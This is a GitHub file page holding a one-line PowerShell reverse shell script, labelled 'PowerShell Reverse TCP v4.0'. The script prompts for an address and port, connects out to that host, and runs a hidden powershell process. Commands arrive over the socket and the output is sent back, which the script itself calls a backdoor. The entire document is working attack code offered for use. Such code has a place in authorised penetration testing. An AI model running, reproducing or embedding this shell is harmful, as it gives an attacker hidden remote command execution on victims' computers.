-
Notifications
You must be signed in to change notification settings - Fork 65
/
powershell_reverse_tcp_prompt_mini.ps1
1 lines (1 loc) · 2.6 KB
/
powershell_reverse_tcp_prompt_mini.ps1
1
$a = $(Read-Host -Prompt "Enter address").Trim(); Write-Host ""; $pt = $(Read-Host -Prompt "Enter port number").Trim(); Write-Host ""; if ($a.Length -lt 1 -or $pt.Length -lt 1) { Write-Host "Both parameters are required"; } else { Write-Host "PowerShell Reverse TCP v4.0 by Ivan Sincek.`nGitHub repository at github.com/ivan-sincek/powershell-reverse-tcp."; $c = $s = $b = $w = $p = $e = $o = $ee = $oe = $null; try { $c = New-Object Net.Sockets.TcpClient($a, $pt); $s = $c.GetStream(); $s.ReadTimeout = 5; $b = New-Object Byte[] 1024; $w = New-Object IO.StreamWriter($s, [Text.Encoding]::UTF8, 1024); $w.AutoFlush = $true; $p = New-Object Diagnostics.Process; $p.StartInfo = New-Object Diagnostics.ProcessStartInfo; $p.StartInfo.FileName = "powershell"; $p.StartInfo.CreateNoWindow = $true; $p.StartInfo.WindowStyle = [Diagnostics.ProcessWindowStyle]::Hidden; $p.StartInfo.UseShellExecute = $false; $p.StartInfo.RedirectStandardInput = $p.StartInfo.RedirectStandardError = $p.StartInfo.RedirectStandardOutput = $true; $p.StartInfo.ErrorDialog = $false; $p.EnableRaisingEvents = $false; $e = New-Object Text.StringBuilder; $o = New-Object Text.StringBuilder; $sb = { if ($EventArgs.Data.Length -gt 0) { $Event.MessageData.AppendLine($EventArgs.Data); } }; $ee = Register-ObjectEvent -InputObject $p -EventName "ErrorDataReceived" -Action $sb -MessageData $e; $oe = Register-ObjectEvent -InputObject $p -EventName "OutputDataReceived" -Action $sb -MessageData $o; $p.Start() | Out-Null; $p.BeginErrorReadLine(); $p.BeginOutputReadLine(); Write-Host "Backdoor is up and running...`n"; while (!$p.HasExited) { try { $by = $s.Read($b, 0, $b.Length); if ($by -gt 0) { $p.StandardInput.Write($b, 0, $by); } else { break; } } catch [Management.Automation.MethodInvocationException] {} if ($e.Length -gt 0) { $w.Write($o.ToString()); $o.clear(); } if ($o.Length -gt 0) { $w.Write($o.ToString()); $o.clear(); } } Write-Host "Backdoor will now exit..."; } catch { Write-Host $_.Exception.InnerException.Message; } finally { if ($ee -ne $null) { Unregister-Event -SourceIdentifier $ee.Name; Clear-Variable ee; } if ($oe -ne $null) { Unregister-Event -SourceIdentifier $oe.Name; Clear-Variable oe; } if ($p -ne $null) { $p.Close(); $p.Dispose(); Clear-Variable p; } if ($w -ne $null) { $w.Close(); $w.Dispose(); Clear-Variable w; } if ($s -ne $null) { $s.Close(); $s.Dispose(); Clear-Variable s; } if ($c -ne $null) { $c.Close(); $c.Dispose(); Clear-Variable c; } if ($b -ne $null) { $b.Clear(); Clear-Variable b; } if ($e -ne $null) { $e.Clear(); Clear-Variable e; } if ($o -ne $null) { $o.Clear(); Clear-Variable o; } [GC]::Collect(); } } Clear-Variable a; Clear-Variable pt;